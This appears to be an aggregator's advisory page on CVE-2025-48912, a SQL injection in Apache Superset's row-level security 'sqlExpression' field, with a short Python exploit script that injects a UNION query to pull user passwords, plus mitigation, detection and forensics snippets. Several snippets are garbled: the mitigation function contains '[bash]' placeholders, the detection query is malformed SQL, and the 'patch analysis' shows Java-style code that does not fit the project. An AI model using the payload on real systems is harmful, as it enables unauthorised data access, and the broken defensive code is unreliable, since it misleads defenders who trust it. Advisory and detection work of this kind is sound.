Apache Superset, SQL Injection, CVE-2025-48912 (Critical)

By /

Listen to this Post

How CVE-2025-48912 Works

This vulnerability exploits insufficient input validation in Apache Superset’s ‘sqlExpression’ field. When row-level security (RLS) rules are configured, attackers craft malicious SQL payloads that bypass parsing defenses. The system fails to properly sanitize user-supplied SQL fragments, allowing UNION-based or subquery injections. Successful exploitation grants unauthorized data access by manipulating RLS predicates. The flaw stems from improper context-aware escaping in the SQL templating engine, permitting direct query manipulation despite parameterized query protections.

DailyCVE Form

Platform: Apache Superset
Version: <4.1.2
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-05-30

Prediction: Patch by 2025-07-15

What Undercode Say:

Analytics:

  • Attack complexity: Low (requires auth)
  • Exploit maturity: PoC expected within 14 days
  • Affected configurations: All RLS-enabled deployments

Exploit Commands:

import requests
session = requests.Session()
session.post('http://target/login', data={'username':'attacker','password':'pwd'})
payload = {"sqlExpression":"1=1 UNION SELECT password FROM ab_user--"}
session.get('http://target/api/v1/security/rows', params=payload)

Mitigation Code:

Temporary workaround
def sanitize_sql_expression(input):
from sqlparse import parse
return str(parse(input)[bash].tokens[bash])

Protection Steps:

1. Immediate upgrade to v4.1.2

2. Apply WAF rules blocking UNION/SUBQUERY patterns

3. Audit all custom RLS rules

Detection Query:

SELECT FROM logs WHERE request_uri LIKE '%sqlExpression=%UNION%'

Post-Exploit Forensics:

grep -r "sqlExpression" /var/log/superset/
journalctl -u superset --since "2025-05-01" | grep -i "sql"

Patch Analysis:

The fix implements strict token whitelisting:

// Patched version
if (!SQL_REGEX.matcher(expression).matches()) {
throw new SecurityException("Invalid SQL fragment");
}

Threat Indicators:

  • Abnormal spike in ‘/api/v1/security/rows’ requests
  • SQL syntax errors containing ‘UNION’ in logs
  • Unexpected data access from single user sessions

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top